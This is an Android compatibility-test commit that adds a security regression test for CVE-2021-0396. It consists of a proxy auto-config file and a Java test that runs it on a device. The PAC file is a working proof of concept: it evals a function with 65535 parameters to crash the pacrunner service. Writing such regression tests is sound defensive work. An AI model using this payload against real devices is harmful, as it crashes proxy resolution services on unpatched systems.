[RESTRICT AUTOMERGE] CTS test for Android Security b/160610106 Bug: 160610106 Bug: 177454305 Test: Ran the new testcase on android-10.0.0_r2 with/without patch Change-Id: I3b3e2c093d762c122324afa0d230386b7bdd950b (cherry picked from commit 2153ff0acc512618f37b19f87f400c51783c04e8)
diff --git a/hostsidetests/securitybulletin/res/cve_2021_0396.pac b/hostsidetests/securitybulletin/res/cve_2021_0396.pac new file mode 100644 index 0000000..5677445 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2021_0396.pac
@@ -0,0 +1,23 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function FindProxyForURL(url, host){ + var evil_call = eval("(function(" + Array(65535).fill("x").join(",") + "){})"); + f(evil_call()); + return "DIRECT"; +} + +function f(){}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java new file mode 100644 index 0000000..3df46a7 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java
@@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import static org.junit.Assert.assertTrue; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0396 extends SecurityTestCase { + + /** + * b/160610106 + * Vulnerability Behaviour: SIGSEGV in pacrunner + */ + @SecurityTest(minPatchLevel = "2021-03") + @Test + public void testPocCVE_2021_0396() throws Exception { + AdbUtils.runProxyAutoConfig("cve_2021_0396", getDevice()); + } +}